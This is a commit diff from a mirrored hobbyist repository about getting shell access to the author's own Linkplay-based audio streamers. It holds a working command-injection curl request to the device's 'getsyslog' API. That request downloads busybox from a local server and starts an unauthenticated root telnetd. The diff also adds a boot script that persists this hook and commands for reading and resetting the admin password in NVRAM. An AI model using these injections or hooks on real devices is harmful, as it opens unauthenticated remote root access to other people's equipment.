github-mirrors/Linkplay
1
0
Fork 0
mirror of https://github.com/Jan21493/Linkplay.git synced 2024-11-20 19:33:58 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

updated content

Browse source
This commit is contained in:
Jan Wachsmuth 2024-01-02 23:51:50 +01:00 committed by GitHub
parent ca415766fd
commit 013e46ca44
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
4 changed files with 162 additions and 9 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
README.md
View file

@ -29,3 +29,6 @@ Information about the boot process, file systems including environment (NVRAM).
## Downgrade Firmware
The first version on my devices was 4.2.8020 from 2020/02/20 (20th of Feb 2020). That version still has some vulnerabilites to be able to get onto the CLI with telnet by pushing a single command to these devices. Although it is good when the vendor is providing upgrades with additional feature and security fixes, I'd still like to be able to "hack" into the CLI. Therefore I had to downgrade the firmware. [Downgrade Firmware](/Downgrade.md)
## Install Persistant Hook
When the device reboots, any changes in ramfs are lost, however there is a way to install a script or command so that it survives a reboot. [Install Persistant Hook](/persistant-hook.md)

13
TELNETD.md
View file

@ -5,14 +5,15 @@ The command that has this vulnerability is **_"getsyslog"_**, see https://develo
The following code snippets are using the IP address 10.1.1.58 for my Arylic Up2Stream device and 10.1.1.22 for a web server running on my local MacMini.
```
curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash;"
curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+555+/tmp/bin/busybox;ln+-s/tmp/bin/busybox+/tmp/bin/telnetd;/tmp/bin/telnetd+telnetd+-l/bin/ash;"
```
The command above is executing the following commands on the device in addition to the "getsyslog" request:
```
mkdir /tmp/bin
wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q;
chmod 777 /tmp/bin/busybox;
/tmp/bin/busybox telnetd -l/bin/ash;
chmod 555 /tmp/bin/busybox;
ln -s /tmp/bin/busybox /tmp/bin/telnetd;
/tmp/bin/telnetd telnetd -l/bin/ash;
```
> **Note:**
> Don't forget to add a ";" at the end inside the quotes. Replace all spaces with "+".
@ -20,9 +21,3 @@ chmod 777 /tmp/bin/busybox;
The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere.
A version of busybox is provided here, but there is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need. See section **_Hardware and Firmware_** for more information. On my web server (10.1.1.22) I've created subdirectory ***/a31/bin*** and have copied the busybox binary to that directory
You may also redirect output and error output for telnetd:
```
curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;"
```

47
boot-process.md
View file

@ -380,6 +380,53 @@ ApCliChannel=6
# a similar output will provide
ralink_init show 2860
```
To read a specific variable from NVRAM or modify its value use these commands:
```
nvram_get 2860 HostName
nvram_get 2860 lan_ipaddr
nvram_get 2860 lan_netmask
# displays password admin and sets a new one
nvram_get 2860 Password
nvram_set Password newpassword
```
The commands are located here:
```
cd /bin
ls l
...
-rwxrwxr-x 1 1000 1000 33220 ralink_init
lrwxrwxrwx 1 1000 1000 11 nvram_set -> ralink_init
lrwxrwxrwx 1 1000 1000 11 nvram_get -> ralink_init
-rwxrwxr-x 1 1000 1000 7800 nvram_daemon
...
```
I found a documentation for these commands:
```
Usage:
a. get: nvram_get [<2860/rtdev>] <field>
b. set: nvram_set [<2860/rtdev>] <field>
c. init: ralink_init <command> [<platform>] [<file>]
<Commands>:
rt2860_nvram_show (display rt2860 values in nvram)
rtdev_nvram_show (display rtdev values in nvram)
show (display values in nvram for <platform>)
gen (generate config file from nvram for <platform> - does not work)
renew (replace nvram values for <platform> with <file>)
clear (??? clear all entries in nvram for - found in a different documentation)
<Platform>:
2860 - rt2860 station or the first Wi-Fi interface
rtdev - intelligent nic or the second Wi-Fi interface (not available for Linkplay A31)
<File>: File name for renew command
Example:
a. nvram_get 2860 SSID /* get the SSID */
b. nvram_set 2860 SSID ralink /* set the SSID to ralink */
c. ralink_init gen 2860 /* generate the RT2860 .dat file from NVRAM */
d. ralink_init show 2860 /* display the INIC configurations in NVRAM */
e. ralink_init renew 2860 ra.dat /* set NVRAM values for RT2860 platform according to ra.dat file */
f. nvram_daemon & /* start the nvram_daemon */
```

108
persistant-hook.md Normal file
View file

@ -0,0 +1,108 @@
# Install Persistant Hook
When the device reboots, any changes in ramfs are lost, but the device is using flash with squashfs and jffs2 file systems. I have not discovered how to modfiy and upload an image to squashfs, but with jffs2 there is a way to install a hook.
Below is an output of mount command (including modification of /etc_ro/web/cgi-bin directory, but that's not required to install a hook) and ***cat /proc/mtd*** output:
```
# mount
rootfs on / type rootfs (rw)
/dev/root on / type squashfs (ro,relatime)
proc on /proc type proc (rw,relatime)
none on /var type ramfs (rw,relatime)
none on /etc type ramfs (rw,relatime)
none on /tmp type ramfs (rw,relatime)
none on /media type ramfs (rw,relatime)
none on /sys type sysfs (rw,relatime)
none on /dev/pts type devpts (rw,relatime,mode=600)
mdev on /dev type ramfs (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,mode=600)
mdev on /dev type ramfs (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,mode=600)
/dev/mtdblock8 on /mnt type jffs2 (rw,relatime)
/dev/mtdblock9 on /vendor type jffs2 (rw,relatime)
none on /etc_ro/web/cgi-bin type ramfs (rw,relatime)
# cat /proc/mtd
dev: size erasesize name
mtd0: 01000000 00010000 "ALL"
mtd1: 00030000 00010000 "Bootloader"
mtd2: 00010000 00010000 "Config"
mtd3: 00010000 00010000 "Factory"
mtd4: 00200000 00010000 "bkKernel"
mtd5: 001df508 00010000 "Kernel"
mtd6: 00950af8 00010000 "RootFS"
mtd7: 00b30000 00010000 "Kernel_RootFS"
mtd8: 00080000 00010000 "user"
mtd9: 00200000 00010000 "user2"
#
```
The mtd9 device named "user2" is not erased at a reboot, because it contains play lists. It is mounted as /vendor and a hook can be installed in ***/vendor/user*** directory as described below. On the Up2Stream Pro device that I own that directory was already present and a script called ***user.sh*** was located in that directory.
> **Note:**
> Neither that directory nor the **user.sh*** script were installed on my Up2Stream Amp device by default. Both devices have the same software version 4.2.8020 from 2020/02/20 (20th of Feb 2020) and were downgraded from v4.6.415145, release date 2022/04/27.
Here's the file from the device where the script was already present (used to start a daemon called ***socket***):
```
# cat user.sh
#!/bin/sh
echo "runing custom's app socket.............."
sleep 5
chmod 777 /vendor/user/socket
sn=`ps -ef | grep /vendor/user/socket | grep -v grep |wc -l`
echo $sn
if [ $sn -eq 0 ]; then
/vendor/user/socket &
fi
# ######### additional code to install telnetd and more #############
# get telnetd from full version of busybox and start in background
mkdir /tmp/bin
wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q
chmod 555 /tmp/bin/busybox
ln -s /tmp/bin/busybox /tmp/bin/telnetd
sn=`ps | grep busybox | wc -l`
if [ $sn -eq 1 ]; then
killall busybox
fi
sn=`ps | grep telnetd | wc -l`
if [ $sn -eq 1 ]; then
killall telnetd
fi
/tmp/bin/telnetd telnetd -l/bin/ash &
# shut down WiFi
ifconfig apcli0 down
ifconfig ra0 down
sleep 60
ifconfig apcli0 down
echo "WiFi disabled!"
# Uncomment to disable sleep after 15 minutes
#while true; do sleep 60; echo 'AXX+MUT+000' >/dev/ttyS0; done &
```
For testing purpose, you may ***reboot*** and ***telnet*** to the device afterwards.
Here's the file from the device where the script was NOT present:
```
mkdir /vendor/user
cat <<\EOF > /vendor/user/user.sh
#!/bin/sh
# get telnetd from full version of busybox and start in background
wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q
chmod 777 /tmp/bin/busybox
/tmp/bin/busybox telnetd -l/bin/ash >/tmp/web/busybox.out 2>/tmp/web/busybox.err &
# shut down WiFi
ifconfig ra0 down
ifconfig apcli0 down
# Uncomment to disable sleep after 15 minutes
#while true; do sleep 60; echo 'AXX+MUT+000' >/dev/ttyS0; done &
EOF
chmod 755 /vendor/user/user.sh
cd /vendor/user
ls -l
```
So far, the device fetches the full version of busybook after each reboot. With ***df*** command you can verify the free space on each of the file systems.